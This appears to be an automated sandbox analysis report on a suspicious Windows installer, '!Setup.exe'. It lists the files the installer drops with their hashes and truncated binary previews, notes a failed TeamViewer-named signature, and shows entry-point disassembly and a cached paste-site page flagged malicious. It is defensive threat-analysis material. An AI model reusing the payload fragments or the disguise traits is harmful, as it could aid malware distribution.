                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):117760
                                                                              Entropy (8bit):5.977012621747547
                                                                              Encrypted:false
                                                                              SSDEEP:1536:OxjgarB/5el3EYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ22:OxjgarB/5elDWy4ZNoGmROL7F1G7ho22
                                                                              MD5:D036147EA7B09A642723D8811105937D
                                                                              SHA1:276CC8C1DDA5D55F549E053522F95CEE037F6B9D
                                                                              SHA-256:DC830AFFB9D9B2E23293BEDA376AD0BDA96CDFF3670CD10ACD131FDCC795855E
                                                                              SHA-512:B23E9E6A86720D1E37399916F66A13612CA570884D84F89383563E30479C37F6D48FB0859220F027E68A29D568B5AF78360112C06EE89BA347145E9AB48F3CF5
                                                                              Malicious:false
                                                                              Preview:..F...N...d...z....................................".......:...N...h...x.................................... ...4...P...b...t.........................n...............*...>...T...p....................................(...@...P...^...t................................&...B...`............................. ...8...J...\...r..................................."...*...@...N...Z...n............................V...J...:...*........................................................*...<...V...l...x...........................................(...2...D...V...f...x....................................... ...2...D...^...x..................x...^...H...2....... ...........................................'...........%...).......................................M...&...........................................h...R...>...(....................................... ...6...F...V...h...v....................................,...:...J...V...b...v.......................................*.
                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):109568
                                                                              Entropy (8bit):6.268600966580074
                                                                              Encrypted:false
                                                                              SSDEEP:3072:GZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3lap:GK5vPeDkjGgQaE/lS
                                                                              MD5:CD16A7A04781F568A2EC3AC1A39FED9C
                                                                              SHA1:37096520C4625AA474494B9C2A10BF31DE8B673D
                                                                              SHA-256:5863794AC1CC6542B2BEE5E8A5CF372C386DB7F2840295B902B1E3B88751A9B6
                                                                              SHA-512:6FB5658A18742FE5428A89E06E7EC0B3AE07658329CDA5FB8F0801356648D992A9C11F9E26D2468E7153665C8F3D626151256336617037B7B5F6BF3B0ED6777A
                                                                              Malicious:false
                                                                              Preview:.......................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F|U............[............u......3........................l.....p.....t.....x.....|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F..
                                                                              Process:C:\Users\user\Desktop\!Setup.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):79872
                                                                              Entropy (8bit):7.997843169471513
                                                                              Encrypted:true
                                                                              SSDEEP:1536:SohxbClN1Bzx9wpidSop7s9FJ8ejlM+wd/zJP7vxugTGMOZ1e:SoraBzPPdS/9XfwpzJP7Jugqj1e
                                                                              MD5:CC9CC6F20A1EA21EA470B504FDE0F90C
                                                                              SHA1:1E7AFADF12F7A09A68C93BA813C64C2C9B225E71
                                                                              SHA-256:2F9D2D953CCFEDDD5DEC2DF0BC5134F002F44F31715BD812F81875CDF6B550A6
                                                                              SHA-512:64C4E6ED40C401BF82ADE85189E7E862F7817965F2739FB7C93B7C2A6FD4B4959585BAF05EEB1E4A21E5F665E64709C3FA670AAE5CA1EE2B7927E7FE1E4D3824
                                                                              Malicious:false
                                                                              Preview:B....L1....=...g...........P.... @....p.,.-..NgP....k....+b...q6I.W.h.3...._z.E.....Ny.P00......4..v.OGE..N_.,.*Q\_m..w.K.....Avb..QW....)>...]..E...#.>..}.......Z/...._...(b.f..F..D......|j.87.....UT.m<....lA.n Ux......7...4...!L....Ie...nC..i.}..#....NS.;.U...|.jO...........1.(..!.......n .."...T.t....Y.X.H......350K...wla.e...d......<.J`.{.]b......O%.S..|r...o'Z.|.E.>.u.......Gm.9.2o^r.Lc.9...I4.K.q.^*......"L.X.`|.1..1.B-.^G`.(FO+..#s.2..V...W.e&....8.L.,|.?....?.+.......-..}.!(@$F./....7..(I.-v...x....z.F......ZO..t...+1......o@.*..s_.Ve.IUK...a. .A..Q:.e_.Kn.R[>W.@.....5...^...g.......h9.|......%.g....+....K._(2............t.R..^.Q.BR...%....8=.Z....i<Py....c..... P_.'..h.*...A].wi\..Z... .K......1....a...c..1.3....lJ=...@.Rc.on...W.o.....a.R0....m*|(o.c...|....GT.ga.....J..e..`......S\..f...D.}..z>9.....D....H..[7> ....3............'=:G..S$qOI.?.....pCg..25.')y...P....s....;.9v.%5..n;.%-..Te...Z..&.....D..!............0b..,...Y....^..
                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):105472
                                                                              Entropy (8bit):5.077087329848572
                                                                              Encrypted:false
                                                                              SSDEEP:768:xhSaAwuXc/mex/SGKAGWRqA60dTcR4qYnGfAHE9AUs6:eaAwusPdKaj6iTcPAsA+
                                                                              MD5:B99AD1F5C7742F52686D2508FD00982A
                                                                              SHA1:7B0449CADAF6A2A28DBF7E65FD45A1FD12EDDB48
                                                                              SHA-256:AC58BF2BC9334DD912148161F79DC611A7326465CF959F7374F387E8AFC61B42
                                                                              SHA-512:78397576FA9CD90C7B8EA8ECE2F5B31887F5E5EB6D5A3C6FB69E4BA2554B14286142D68DB2F6DEEC4C21AD28B8148A89494154F65CE36F24EEA793EB3D96F472
                                                                              Malicious:false
                                                                              Preview:......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!...~...!...+*..!...]...!...(*..!...?*..!...=...!...E...!...G...!....*..!....*..!....*..!.......!...2...!...3...!...6...!...5...!...O...!...K...!...1...!...(...!...D...!.../...!...-...!....)..!...A...!....)..!...+...!...*...!....)..!...&...!...*...!.......!...'...!.......!...%...!.......!...................................t.......................................................t.......&.......%.......@.......?............... ......" ......; ......& ....... ......3 ....... ....../ ......7 ....... ......+ ......C ..............................".......;.......&...............3.............../.......7.......................+.......C...............................".......&...............+......./...............................3.......7.......................&.......;........................~.......P....... .....................................................................
                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):895
                                                                              Entropy (8bit):3.529004704992108
                                                                              Encrypted:false
                                                                              SSDEEP:12:oLOyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1:oiyGS9PvCA433C+sCNC1
                                                                              MD5:9FA6250AC33B492A0812FC44C12A8A0C
                                                                              SHA1:B4277E0D18E4FDB16B4437F0803BB6E04438A162
                                                                              SHA-256:26A3D1D787256EDD456A7E86452AD615AD8AEA98C58F8ECEA9EE4978F62D02DE
                                                                              SHA-512:FFE0CD06A9BD86E673A0D92E3C7FB87A2E50A80B40C4716EE224264F9BE8A4E32F78E86F38E38156AD40CA8D987537CB65B9B9DDA86BFEF2FDBB9AD0CB836E52
                                                                              Malicious:false
                                                                              Preview:Ratio........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B..................................................................................................................................................................
                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):62464
                                                                              Entropy (8bit):6.691860814252206
                                                                              Encrypted:false
                                                                              SSDEEP:1536:82U0pkzUWBh2zGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TvYd:82UDQWf05mjccBiqXvpgb
                                                                              MD5:85667E167580AB6EE879A397EC8378D5
                                                                              SHA1:3C22100369DD7E9FC15788182A7647CC18A12EC8
                                                                              SHA-256:FAB0E8057B43711FDCF24AB3BB355B5CBC3F3D37782E598BF4925AB58E602E74
                                                                              SHA-512:398C52BEC5B244353715BC4A044415DB5A542BB9EF8C98D4C425BAEA55E2BDC0946753C5AE1775A950FB1FC2F2F3119243178D58F3230873A77086BB4FFF31D4
                                                                              Malicious:false
                                                                              Preview:f;E.u...u4IG..f..A..v...f;E.t.f;E.t.f;E.u...._^[..F.r...N.l.....t...U..QQV...E.....3..E.W....tn.....FP.P...Y..ua..3.S.]....V....+tVH...tLf9.Vt....VP.h...Y..t.k.....E.....V.....B..3...f9.Vu....M..E...[_^..2......M..B...U..Vj.....D..Y.u........F....F.....^]...U....SVW.}...3.j.A.G.[.M..@.f9X...V......e....d....;.........m.....h.............:.t...uY..:.t...uS..:.........uI..]...;Z.~L..u>..;Z..A.U.B.U...u1.M...d....@...;...H..._^[.....P0.P0.P0.P0.@0..j.h.....:...U..Q...SVW.13.....M.x>..>.+....S..s...0.u......YY..x.~..{..M.;.~.;....._^[.....s.......V..~..t..~..Wu..~.........F.._.N.^.N..y...t.Q......~..F....V...(..j.V.=C..YY..^...U..V..W.F...........}.S..........j.[9_...4..................[.N.....4..._..^]...U..QSVW...G...................u?.u..~....O...j.Y9N..........6........../...O..........._^[.......................M...U..QQV..~..t..y......]..'...E....F.....^..U....SVW..M.h..I......u..F....x........j8..B......$.....'..>B..Y..G..c....O..#......T....F..0...]..
                                                                              Process:C:\Users\user\Desktop\!Setup.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):51200
                                                                              Entropy (8bit):7.996655669830848
                                                                              Encrypted:true
                                                                              SSDEEP:1536:VklthqG33QEqywJCsrUvekJ9dVLw45uRY4hUfrR:V23AEVwEfJ9XLw45riUfrR
                                                                              MD5:76D9165FFF95E5302786C486398E284B
                                                                              SHA1:ABE552EE6A06100D96AEFC6F2AF6E189AA766227
                                                                              SHA-256:1B5A2E903DEC1BD0620E473D0DFF69761ACF5E375EAC1ED87ADF76F36F2386A3
                                                                              SHA-512:6CC547E452FDA1A60FBFB016027791788B23C3591114D7800B244ABA620717DF5A72B5CA1C98AA1355CA2C8B0E7395C04EC072DB9606540051FD99B1846FB198
                                                                              Malicious:false
                                                                              Preview:.N...9.yHi..>..d.W.Xd8.r..M...%.*|.......ig.]}>...l.T..d.7.6..$..L.......Gv5.1._x...1l..X....y....>...9.B%{...ZZ..y.K}...=..l..]..T.....o.j..t.q....B..H...|n).KY.5..U.u.B..!.Z.*.....z(|.B.zz8..N.M....0)FF[R.32A..n...W/........!..+Q..{S.:07:.c|.\NK..R.!.v_...Ye.J.lPg..=mju....".`.....X.|.)Np..p..S......Q.`.OT..A..&....>........,..'......4$.x.c|.].D..=*..&+#D...~g...%q....V..........v`..E.~.q..}}r...wi...iB uG..T..[.|%.#-.XG^....ED.....u:*.vOP.:.....`>{.:....+q..}.....pz..Ct..6-.I...a].D.c.....V.0...=}sQ.ig..!A...."k.f.D..G....&.&.Q..+.M.....`.O....s...._Q..j.x...9.ld.....G9......<W.[.Bi...6....+I+W....0R6d.jh?..qe.......a..k.".....__....$..3..<........C}..l...a..=Xf..?.2"..V..d....+02..s.s(L. *7...W*..5Yj)bZ.T..S..Q........D.7IzZ~f7.uy.9k+.....>.^...}%....;.Vc.!.-.0..T...j..E.....HP;..-=H.Z...f.J.*Z...i?...l..?A..i.a.`LFo.w...JU..a .6.l.O....G.........Y..K.....X..+..D...A$....^.`..).2j,...+*.-$.}.G....H.w.<.. ....a qR.....?.[..S.%JE.6
                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):144384
                                                                              Entropy (8bit):6.466063523256831
                                                                              Encrypted:false
                                                                              SSDEEP:3072:PDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbI:GO5bLezWWt/Dd314V14ZgP0JaAOz04pC
                                                                              MD5:57B6E79E7402D37A0B83CFF2DB1D0273
                                                                              SHA1:8805DF3CABF590F92B2ECB7EFAE60D82F14F0B6F
                                                                              SHA-256:8DF20B2B819AA0C6E36877BA7063FED41274B988C46C28EC7E4B3C72584EC2E7
                                                                              SHA-512:49EAFE0D09F850C52006C3DF4DD58E2D4CE1D6AA22AA7A378D6345AB6FE7C92987E134E4C486DEF75E6B0219D867AE1229AA828440C5624EF8C93C7CC1E79DAF
                                                                              Malicious:false
                                                                              Preview:...Pj..t$\Q....I...tF...@..|8...L8.t..I8.A......|8...L8.t..I8.A...|$.........t$.....I......C..L$$3.SSQS.L$0Q.t$<.H.....HP.t$0....I...t(...@..L8.8\8.t..I8.I...L8.8\8.t..I8.Y....M..D$(P..M....S.t$(.H....(....t$..5..I...9\$.t..t$...L$P......L$0.%....L$@......D$,.(.u.j.P.8...t$0..8....._^3.[..]...U......LSVW.}...h..I....B....L$8.....L$(.....L$H.....E..@..0........N..........A..B..A..B..A..B....D$XP.D$<P.D$PP.....D$(.......D$<.A..D$@.A..D$D.A....D$0P.D$,P......u1...@..|....L..t..I8.A......|....L..t..I8.A...l...3..D$.9D$<t].D$.P.t$..t$@..$.I...t@j.P...H.........H..|....D..t..@8.@......|....D..t..@8.@........L$....L$..D$.P.D$$.....P3.P.t$TQ....I...tRj.P...H....O....|$..t..t$.....I....@..|....L..t..I8.A......|....L..t..I83..A......E..@..p....K....F..L$.Q3.L$ RQR.0.t$$.. .I...j.^..1...t6j.P.......H..|....D..t..@8.H...|....D..t..@8.@.......3.P.t$ ....D$.........j.Z;............h...;..........t`..........E..D$......@..p........D$.P.D$$P3.PP.F..0.t$$.. .I..]...t$ .|$$.A...j.X
                                                                              Process:C:\Users\user\Desktop\!Setup.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):71680
                                                                              Entropy (8bit):7.997185886941614
                                                                              Encrypted:true
                                                                              SSDEEP:1536:bvgT0gwThL3g9hMNG6HNnBAcmSJU3VXkxf3nZ9rY47K0qMLE9S7f:bvgABhL32wHNn6cBgX+brY47K0qqtf
                                                                              MD5:34BE2CF79F42494DB963EC85DA206D2E
                                                                              SHA1:2713983B0B393CFF8E07630B1ABC107FE90BDC5B
                                                                              SHA-256:7CFB013FACCD6086F660D5B46712EBACABF2A160A26E453A7B83D83412A16A11
                                                                              SHA-512:47CD4E47A69059235607B95342E069CCD7C8E41F7D6D9E1DDC9BF5F93BC8C7A064A49EDC26ADC41CCD3F24B5515E965D3E9CAAC391D345D3D5209C6ADEDD61CB
                                                                              Malicious:false
                                                                              Preview:E#....p.C...d.....7%y.~0~.|...1....o.|.....}(..7...3.....8.0..|.....j$.e.....p......jn.W..U.hJ.Ei...}...B.Y.F.kt.E...n.H@*...O.G8...x.].^b.P.3....J..V.J...;.~.....0;.....`\"G...@;..t...Y........u.8.sY..d.b...1b..p...O....M KL3.TqH-J.k......\..f..%|p.k...-1._.M@ll.l..Z....W..?...w..*....V..t..2I.......V.Z....H.NPa.$.e7OE.1.._...^..........N.... (.PN....33.7......<"E!.E..........*."Q..;..C../............_m...H.j...\...O0&,Z.B..)..).H.8=.E.,..1...HCtGG.BC.*..3.="./...4z....r..q.kQx.DE.......u2;R....e.......%.t...v.B.X..8}... ..D.....g..H.........D...K.C..RPPgbtX*....A.%...E..s....8..MG(.....v..g.v,..J.v9.)cv.....y.n...N.n|...xE..&.%oz....W....E'/Y..............^...., V...5.k...dj.......}.9xP}\.R..S.q....L.t=.<...b. D...Q...<..',.v.I.....,.Cjq.....]f1.m.+..@...i_ {..J..T.:U....t>.&}..G..@.9....G.FH.K.Y...K(.".'#.......$.........urd.o}*..E..;..5.p...s..@../.w#...my......@....;......e...1.8.p..X..9.v.Q...I...O...._...d..&...N..{.hB....g....o...x.
                                                                              Process:C:\Users\user\Desktop\!Setup.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):34424
                                                                              Entropy (8bit):7.994339551631228
                                                                              Encrypted:true
                                                                              SSDEEP:768:VCFeeq+5DGzH8CfNr7GfSLnANmqrfy10Uy/hrMBohg9:VCFeeQBlr7GKzaXy0UyZrK
                                                                              MD5:F0067E491667E285C6AA36CABB0934F0
                                                                              SHA1:05F07BC57272ACEA6794F92726B6B05AC4BF41EA
                                                                              SHA-256:7C27FA3805B5877F74A80274B3ACCFF8041CFCB5C8FF930DE5B93F49569A9C8E
                                                                              SHA-512:FFDAD8684222F1E957A8E64DF94EE6DEA74BE948E8ABA9C759B5995B8337A9C1F363C1B098D32C393DC69D7470C9BA2E748E4D057F3FE89E6F4C99B02DE2F9AF
                                                                              Malicious:false
                                                                              Preview:.<]......].....F.`..E........!......Fz....`Ey.Z......c.........]...@...8..(..[.(..iR.G..*,...0.d......[...D32...x.=..7y;.=#..3{.:.Af.F.8,C:..b....[..<4....P..P....a.9?.l1D..A...JU8...T.kYXY.....U2...0...A..7<......;...jS.......}9_.....k.n....e.....Z...t<V.....Z...y...|1i.,........d.3...YN..[x. .y-.i.z.D........3..Q.......j..BH....C.....)zyg"..Y..[wG+..+..''`.9..5:Y{r.8H5..4.rXuC#F......g..._-.Z(.....,.>..P]..bD..2s........wU......5......5i..Xg..\%..*cr5e..+...(=./...-Z.y..M.@..@..;..9.Z:..j.......ju*..e;..#......X...t.S....5......Iva*...!...q..{..N.H.*.s...kYp...h9...>f.{%.}....|.....b}]...O...Rcm.K. q. 51...-.?....>.{.:.($...)E......h../f.R1...`.u.m`..o....=YmAV...mR(!.$.j$...9.~.C5.CZ...h. 4..r.."{.U..}Hb.s)._..q.j.3..Y.VI:...*..g.}...^.vY#....#.......r..)........9nnQ.-.'F....._.....Z.6......GN...[..E.z.R..g...D..z...........9W...(c\g.E.=..*5L..Uq....O0.....54.3....U3D..D..{...c..%......J.Rf...t.....Eg.....8|.Y.n.j#."..d.w....u..d.Y..S>.
                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):7390
                                                                              Entropy (8bit):7.597721493375944
                                                                              Encrypted:false
                                                                              SSDEEP:192:bH6N8VEVFJ84kcGNq4/C+Q3ISVSWMZMQ3rw:brVEVFJ8ZcGwGBk7/UMQ3rw
                                                                              MD5:117FE1670C955271C9D468192301A43F
                                                                              SHA1:46E5D4E2284C95B30D8D5C8C506A5376987B70A6
                                                                              SHA-256:4C4FD142141A03A04B927A31F365DFB0ACD6F972340B109430AF367EAA2856ED
                                                                              SHA-512:1BECFB8DDE3672C2A6FBD33BE641CD0E15852365AD2DEED41700F3C441BE90F691B564AE947813A04D19665E9B39AC17F73B1A7EFB54CE8B4821B0A25D2DCEF9
                                                                              Malicious:false
                                                                              Preview:d...H*}.)..f..+....";Y.}..#....). .%|.X.[.....tgo..!sN....9v.\...|.)F.....1.I4V(F.......x.t.2.............T.Ia.S..&zp2....5..U..ye.{.$.;..!.f...E...1..70..3...0j0Z1.0...U....BE1.0...U....GlobalSign nv-sa100...U...'GlobalSign CodeSigning CA - SHA256 - G3..8.Hn...04.J0...`.H.e.........0...*.H......1...+.....7...0...+.....7...1.0...+.....7...0/..*.H......1". .g.6..l....#..t.X..n|$>.......0^..+.....7...1P0N.". .A.u.t.o.I.t. .v.3. .S.c.r.i.p.t.(.&https://www.autoitscript.com/autoit3/ 0...*.H............>./.f..m..6.5.f..V..6.......E.]....Q...).S.......A20......|.aH|A..B;.L:..,...<.d>m._.Ij..Fx...2........~,.P.......u.um..S..7c.]..\f....e{W.XM&..*.b.=4..)....C.O).@.....&OX.29\.K.bG..;c-f..:.. .K..u.....O.riW....u5.GU[..zoH.e..i.....0RZ....5....0.....+.....7...1...0.....*.H..........0......1.0...`.H.e....0....*.H..............0.......+.....2..010...`.H.e....... .s....Y....8.z..^.....&.....2...M:BiRb.Sanz...M.....20220227153015Z0.....W.U0S1.0...U....BE1.0...U..
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):0.6599547231656377
                                                                              Encrypted:false
                                                                              SSDEEP:3:NlllulRlltl:NllU
                                                                              MD5:2AAC5546A51052C82C51A111418615EB
                                                                              SHA1:14CFBEF3B3D238893C68F1BD6FE985DACF1953F1
                                                                              SHA-256:DBBA7151765EDB3661C0B1AD08037C0BDDC43227D2F2E8DDAC33C4A1E7C4151F
                                                                              SHA-512:1273F4B0365E213134E7FBC3BE45CAC33CB32AB6CED85479905C702F0429A0491A5E9C878E5FEFFA05BB0D1AA7F704949D13DD1DA9FCEB93665F1CC110FB24B8
                                                                              Malicious:false
                                                                              Preview:@...e...........................................................
                                                                              Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                                              File Type:HTML document, ASCII text, with very long lines (945)
                                                                              Category:dropped
                                                                              Size (bytes):5659
                                                                              Entropy (8bit):5.039280615096417
                                                                              Encrypted:false
                                                                              SSDEEP:96:5puA5jKEcXrj7uDQgzds4x3pBxu04nx/ICu:5p9pcXr2DFze4x3pBIHnx/ju
                                                                              MD5:B417EB3353C5375A9FD8CDE2774CFA7F
                                                                              SHA1:ABF9585C8DB4CE18762C52584D40B065EB813C8A
                                                                              SHA-256:8C20C24FCBA84BB4950B653CB00CDD8AC801CE4C27CFA4CBD42E690D6B356AEB
                                                                              SHA-512:C2176B85CC373D271BD7A1F49A64B36034987927634E4D8B84105D79788C5EC47FAEBBF46CE8D2C0E33D99AEAFF07B2FA078BA9FFB8514B8EC6B8030E85F055B
                                                                              Malicious:true
                                                                              Preview:<!DOCTYPE html>..<html>...<head>. <meta charset="utf-8">. .<title>What</title>.<link rel="canonical" href="https://rentry.co/what" />.. .<meta name="description" content="Rentry.co is a markdown paste service with preview, custom urls and editing. Fast, simple and free.">.<meta name="keywords" content="paste, markdown, publishing, markdown paste service, markdown from command line">..<meta name="twitter:card" content="summary" />.<meta name="twitter:description" content="Markdown paste service with preview, custom urls and editing." />.<meta name="twitter:title" content="Rentry.co - Markdown Paste Service" />.<meta name="twitter:site" content="@rentry_co" />.<meta name="twitter:image" content="https://rentry.co/static/icons/512.png" />..<meta property="og:url" content="https://rentry.co/" />.<meta property="og:title" content="Rentry.co - Markdown Paste Service" />.<meta property="og:description" content="Markdown paste service with preview, custom urls and editing." />.<meta p
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):4.895386354455606
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:!Setup.exe
                                                                              File size:14'692'191 bytes
                                                                              MD5:cb8f02134e7a9e082e0d9bf4c988b202
                                                                              SHA1:c4a32f3385e1b91d135d2f713779299bdb6d0ab0
                                                                              SHA256:2b5fdba3647700d3dde718e3b43fde8c12f3425d0ab768d446450deeb1a3de33
                                                                              SHA512:e1bb2da52c92c2834a4225574adaccf7d960b6be9d846578521d3204b465710cb10dd184859a36f004c4acd761844741cab84a363682a42a4d7e17b6cd6a6144
                                                                              SSDEEP:24576:oRVUf5F4PCxULgB/88cv15mKLTanYE2caHvdzzfn2ex:d5gcB/88cDPLT0i9f2ex
                                                                              TLSH:64E6C43033FCD43DD95608C1EA91B6D3A667E6E1B483506CA2588EED31B350DBE5CB68
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
                                                                              Icon Hash:e899b89cfa1a7810
                                                                              Entrypoint:0x4038af
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:true
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:0
                                                                              File Version Major:5
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                              Signature Valid:false
                                                                              Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                              Error Number:-2146869232
                                                                              Not Before, Not After
                                                                              • 04/05/2023 01:00:00 07/05/2026 00:59:59
                                                                              Subject Chain
                                                                              • CN=TeamViewer Germany GmbH, O=TeamViewer Germany GmbH, L=G\xf6ppingen, S=Baden-W\xfcrttemberg, C=DE
                                                                              Version:3
                                                                              Thumbprint MD5:0D637B42FF0AB3019673C4243305BD25
                                                                              Thumbprint SHA-1:777A41024CF413CCB49B3434565545C0D78D80E9
                                                                              Thumbprint SHA-256:3A0A9BD3CBF08E350DACBFCB54C53F00113D929DAD01AF4C9D5BFE37ACF9F352
                                                                              Serial:062EE3FD7CDC52097C1DA6AFA87C745E
                                                                              Instruction
                                                                              sub esp, 000002D4h
                                                                              push ebx
                                                                              push ebp
                                                                              push esi
                                                                              push edi
                                                                              push 00000020h
                                                                              xor ebp, ebp
                                                                              pop esi
                                                                              mov dword ptr [esp+18h], ebp
                                                                              mov dword ptr [esp+10h], 0040A268h
                                                                              mov dword ptr [esp+14h], ebp
                                                                              call dword ptr [00409030h]
                                                                              push 00008001h
                                                                              call dword ptr [004090B4h]
                                                                              push ebp
                                                                              call dword ptr [004092C0h]
                                                                              push 00000008h
                                                                              mov dword ptr [0047EB98h], eax
                                                                              call 00007FDA888AFD4Bh
                                                                              push ebp
                                                                              push 000002B4h
                                                                              mov dword ptr [0047EAB0h], eax
                                                                              lea eax, dword ptr [esp+38h]
                                                                              push eax
                                                                              push ebp
                                                                              push 0040A264h
                                                                              call dword ptr [00409184h]
                                                                              push 0040A24Ch
                                                                              push 00476AA0h
                                                                              call 00007FDA888AFA2Dh
                                                                              call dword ptr [004090B0h]
                                                                              push eax
                                                                              mov edi, 004CF0A0h
                                                                              push edi
                                                                              call 00007FDA888AFA1Bh
                                                                              push ebp
                                                                              call dword ptr [00409134h]
                                                                              cmp word ptr [004CF0A0h], 0022h
                                                                              mov dword ptr [0047EAB8h], eax
                                                                              mov eax, edi
                                                                              jne 00007FDA888AD31Ah
                                                                              push 00000022h
                                                                              pop esi
                                                                              mov eax, 004CF0A2h
                                                                              push esi
                                                                              push eax
                                                                              call 00007FDA888AF6F1h
                                                                              push eax
                                                                              call dword ptr [00409260h]
                                                                              mov esi, eax
                                                                              mov dword ptr [esp+1Ch], esi
                                                                              jmp 00007FDA888AD3A3h
                                                                              push 00000020h
                                                                              pop ebx
                                                                              cmp ax, bx
                                                                              jne 00007FDA888AD31Ah
                                                                              add esi, 02h
                                                                              cmp word ptr [esi], bx
                                                                              Programming Language:
                                                                              • [ C ] VS2008 SP1 build 30729
                                                                              • [IMP] VS2008 SP1 build 30729
                                                                              • [ C ] VS2010 SP1 build 40219
                                                                              • [RES] VS2010 SP1 build 40219
                                                                              • [LNK] VS2010 SP1 build 40219
                                                                              NameVirtual AddressVirtual Size Is in Section
